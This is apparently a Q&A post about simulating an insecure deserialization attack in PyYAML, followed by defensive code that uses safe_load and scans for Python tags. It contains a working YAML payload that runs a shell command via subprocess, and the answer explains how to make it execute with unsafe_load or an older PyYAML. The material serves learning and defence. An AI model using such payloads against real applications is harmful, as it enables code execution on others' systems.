So I'm currently trying to simulate an Insecure Deserialization attack. Here's the code I'm using:
    import yaml

    with open('malicious.yml') as yaml_file:
        contents = yaml.load(yaml_file)
    print(contents['foo'])
The file malicious.yml contains the following:
    foo: !!python/object/apply:subprocess.check_output ['ls']
However, when I run the script, I get the following error:
    yaml.constructor.ConstructorError: could not determine a constructor for the tag 'tag:yaml.org,2002:python/object/apply:subprocess.check_output'
      in "malicious.yml", line 1, column 6
I looked around a bit but still couldn't find why. Any help would be appreciated.
If you are trying to simulate an insecure deserialization attack, you should use

    contents = yaml.unsafe_load(yaml_file)

or use an older version of PyYAML (`pip install "pyyaml<4"`). The API was changed with version 4.1 without any documentation changes.
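As an added example (not code from either poster), the following shows the defensive side of the same behaviour: `yaml.safe_load` refuses the `!!python/...` tag with exactly the ConstructorError quoted in the question, and the node graph can be inspected for Python-specific tags before anything is constructed, which is a useful check when logging or rejecting untrusted YAML. The two YAML strings and the function names are constructed for this example; the only library calls are PyYAML's public `safe_load`, `compose` and node classes.

```python
import yaml

# Constructed samples: the first mirrors the question's malicious.yml,
# the second is an ordinary document with no custom tags.
MALICIOUS_YAML = "foo: !!python/object/apply:subprocess.check_output ['ls']\n"
BENIGN_YAML = "foo: bar\nlist: [1, 2]\n"

# All PyYAML-specific constructors live under this tag namespace.
PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"


def find_python_tags(text):
    """Return every tag in `text` that would invoke a Python-specific constructor.

    Composing only builds the node graph; no constructor runs, so this is a
    safe way to inspect (and log) what an untrusted document asks for.
    """
    root = yaml.compose(text, Loader=yaml.SafeLoader)
    found = []
    stack = [root] if root is not None else []
    while stack:
        node = stack.pop()
        if node.tag and node.tag.startswith(PYTHON_TAG_PREFIX):
            found.append(node.tag)
        if isinstance(node, yaml.MappingNode):
            for key_node, value_node in node.value:
                stack.append(key_node)
                stack.append(value_node)
        elif isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
    return found


def load_untrusted(text):
    """Parse YAML from an untrusted source with SafeLoader only.

    Returns (data, None) on success, or (None, message) when the safe loader
    refused a tag; the message is the same ConstructorError text the question shows.
    """
    try:
        return yaml.safe_load(text), None
    except yaml.constructor.ConstructorError as exc:
        return None, str(exc)


if __name__ == "__main__":
    print("tags in malicious document:", find_python_tags(MALICIOUS_YAML))
    print("tags in benign document:", find_python_tags(BENIGN_YAML))
    print("safe_load(malicious):", load_untrusted(MALICIOUS_YAML))
    print("safe_load(benign):", load_untrusted(BENIGN_YAML))
```

`find_python_tags` is the check worth keeping in a deployment: `safe_load` already rejects these tags, but surfacing the offending tag in a log line tells an operator that someone sent a document built for `unsafe_load`.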